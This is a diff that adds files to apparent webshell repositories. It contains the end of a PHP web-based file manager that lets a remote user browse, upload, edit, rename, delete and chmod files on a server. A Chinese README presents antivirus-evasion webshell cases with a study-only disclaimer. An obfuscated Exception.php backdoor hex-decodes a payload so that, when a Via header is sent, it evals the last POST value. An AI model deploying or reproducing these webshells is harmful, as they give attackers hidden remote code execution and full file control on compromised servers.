+    "; exit;
+}
+
+if (isset($_POST["create_file"])) {
+    echo "
+    create on : <input type='text' autocomplete='off' id='textinput' name='pathfile' value='".$path.$slash."' width='100px'><br>
+    <input type='text' autocomplete='off' name='filename' id='three' placeholder='file name'><hr color='Gray'><center><a href='?path=".$_GET["path"]."'>cancel</a>
+    <input type='submit' name='crfl' value='create' id='two'>
+    "; exit;
+}
+
+echo "
+<input type='text' readonly='readonly' id='one' value='".$path.$slash."' style='width: 100%;'><hr color='Gray'>
+<input type='submit' name='upload' value='upload'>
+<input type='submit' name='create_folder' value='+ folder'>
+<input type='submit' name='create_file' value='+ file'>
+<input type='submit' name='phpinfo' value='phpinfo'>";
+
+echo "<table width='100%'>";
+
+if ($path !== "/") {
+    $alpha = dirname($path);
+    echo "<tr><td width='2%'><div class='iclass'><a href='?path=".base64_encode($alpha)."'>..</a></div></td></tr>";
+}
+
+$scanPath = scandir($path);
+$scanPath = array_diff($scanPath,array('.','..'));
+$scanPath = array_values($scanPath);
+
+for ($i = 0; $i < count($scanPath); $i++) {
+    $iota = $scanPath[$i];
+    if (is_dir($path.$slash.$iota)) {
+
+        $result = filemtime($path.$slash.$iota); $result = getdate($result);
+        $one = strlen($result["mday"]); $two = strlen($result["mon"]);
+        $three = strlen($result["year"]); $four = strlen($result["hours"]);
+        $five = strlen($result["minutes"]);
+        if ($one == "1") {
+            $result["mday"] = "0".$result["mday"];
+        } if ($two == "1") {
+            $result["mon"] = "0".$result["mon"];
+        } if ($three == "1") {
+            $result["year"] = "0".$result["year"];
+        } if ($four == "1") {
+            $result["hours"] = "0".$result["hours"];
+        } if ($five == "1") {
+            $result["minutes"] = "0".$result["minutes"];
+        } $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
+
+        echo "<tr><td width='2%'><div class='iclass'>D</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+        <td width='10%'><center>-</center></td><td width='20%'><center>".$result."</center></td>
+        <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+        <td style='width: 5%'><center><a title='open ".$iota."' href='?path=".base64_encode($path.$slash.$iota)."'>O</a>
+        <a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+        <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
+        </tr>";
+    }
+}
+
+for ($i = 0; $i < count($scanPath); $i++) {
+
+    $iota = $scanPath[$i];
+    $pathType = mime_content_type($path.$slash.$iota);
+    $pathType = explode("/", $pathType);
+    $sizeA = filesize($path.$slash.$iota);
+    $filesize = $sizeA;
+    $sizeks = "B";
+    if ($sizeA > 1024) {
+        $filesize = round($sizeA / 1024);
+        $sizeks = "KB";
+    }  if ($sizeA > 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024);
+        $sizeks = "MB";
+    } if ($sizeA > 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024);
+        $sizeks = "GB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "TB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "PB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "EB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "ZB";
+    } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024  * 1024) {
+        $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+        $sizeks = "YB";
+    }
+
+    $result = filemtime($path.$slash.$iota); $result = getdate($result);
+    $one = strlen($result["mday"]); $two = strlen($result["mon"]);
+    $three = strlen($result["year"]); $four = strlen($result["hours"]);
+    $five = strlen($result["minutes"]);
+    if ($one == "1") {
+        $result["mday"] = "0".$result["mday"];
+    } if ($two == "1") {
+        $result["mon"] = "0".$result["mon"];
+    } if ($three == "1") {
+        $result["year"] = "0".$result["year"];
+    } if ($four == "1") {
+        $result["hours"] = "0".$result["hours"];
+    } if ($five == "1") {
+        $result["minutes"] = "0".$result["minutes"];
+    } $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
+
+    if ($pathType[0] == "text") {
+        echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+        <td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
+        <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+        <td style='width: 5%'><center><a title='edit ".$iota."' href='?path=".base64_encode("#E".$path.$slash.$iota)."'>E</a>
+        <a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+        <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
+        </tr>";
+    } else {
+        if ($pathType[0] == "application") {
+            echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+            <td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
+            <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+            <td style='width: 5%'><center><a title='edit ".$iota."' href='?path=".base64_encode("#E".$path.$slash.$iota)."'>E</a>
+            <a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+            <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td>
+            </tr>";
+        }
+    }
+}
+
+for ($i = 0; $i < count($scanPath); $i++) {
+
+    $iota = $scanPath[$i];
+    $pathType = mime_content_type($path.$slash.$iota);
+    $pathType = explode("/", $pathType);
+    if ($pathType[0] !== "application") {
+        if ($pathType[0] !== "text") {
+            if (is_file($path.$slash.$iota)) {
+
+                $sizeA = filesize($path.$slash.$iota);
+                $filesize = $sizeA;
+                $sizeks = "B";
+                if ($sizeA > 1024) {
+                    $filesize = round($sizeA / 1024);
+                    $sizeks = "KB";
+                }  if ($sizeA > 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024);
+                    $sizeks = "MB";
+                } if ($sizeA > 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024);
+                    $sizeks = "GB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "TB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "PB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "EB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "ZB";
+                } if ($sizeA > 1024 * 1024 * 1024 * 1024 * 1024 * 1024 * 1024  * 1024) {
+                    $filesize = round($sizeA / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024 / 1024);
+                    $sizeks = "YB";
+                }
+
+                $result = filemtime($path.$slash.$iota); $result = getdate($result);
+                $one = strlen($result["mday"]); $two = strlen($result["mon"]);
+                $three = strlen($result["year"]); $four = strlen($result["hours"]);
+                $five = strlen($result["minutes"]);
+                if ($one == "1") {
+                    $result["mday"] = "0".$result["mday"];
+                } if ($two == "1") {
+                    $result["mon"] = "0".$result["mon"];
+                } if ($three == "1") {
+                    $result["year"] = "0".$result["year"];
+                } if ($four == "1") {
+                    $result["hours"] = "0".$result["hours"];
+                } if ($five == "1") {
+                    $result["minutes"] = "0".$result["minutes"];
+                } $result = $result["mday"]."-".$result["mon"]."-".$result["year"]." ".$result["hours"].":".$result["minutes"];
+
+                echo "<tr><td width='2%'><div class='iclass'>F</div></td><td width='50%'>| <input type='text' readonly='readonly' id='one' value='".$iota."' style='width: 50%'></td>
+                <td width='10%'><center>".$filesize.$sizeks."</center></td><td width='20%'><center>".$result."</center></td>
+                <td width='5%'><center><a title='chmod ".$iota."' href='?path=".base64_encode("#C".$path.$slash.$iota)."'>".substr(sprintf('%o',fileperms($path.$slash.$iota)),-4)."</a></center></td>
+                <td style='width: 5%'><center><a title='rename ".$iota."' href='?path=".base64_encode("#R".$path.$slash.$iota)."'>R</a>
+                <a title='delete ".$iota."' href='?path=".base64_encode("#D".$path.$slash.$iota)."'>D</a></center></td></tr>";
+            }
+        }
+    }
+}
+
+echo "</table><hr color='Gray'><center>coded by upsilonCrash</form>";
+
+?>

webshell-free/README.md

@@ -0,0 +1,19 @@
+# webshell-free
+![visitor badge](https://visitor-badge.glitch.me/badge?page_id=https://github.com/rexSurprise/webshell-free.git)
+## ！！！声明！！！
+
+**本程序仅供于学习交流，请使用者遵守《中华人民共和国网络安全法》，勿将此脚本用于非授权的测试，脚本开发者不负任何连带法律责任。**
+
+
+
+webshell免杀案例
+
+
+
+包含大佬开发的项目
+
+✅ [JSP-Webshells](https://github.com/threedr3am/JSP-WebShells)
+
+✅ [webshell-venom](https://github.com/yzddmr6/webshell-venom)
+
+### https://github.com/rexSurprise/webshell-free

webshell-free/php/Exception.php

@@ -0,0 +1,16 @@
+<?php
+try{
+    $value = 'echo "hello~"';
+    apply();
+}catch(Exception $e){
+    eval(pack('H*',$e->getMessage()));
+}finally{
+    eval($value.';');
+}
+
+function apply(){
+  if(isset($_SERVER['HTTP_VIA'])){
+    throw new Exception('2476616c75653d656e6428245f504f5354293b');
+  }
+  return false;
+}

xl7dev/webshell/other/webshell/read.me

@@ -0,0 +1 @@
+fix error

zxc7528064/-WebShell-/README.md

@@ -0,0 +1,3 @@
+## -WebShell-
+
+from :https://github.com/zxc7528064/-WebShell-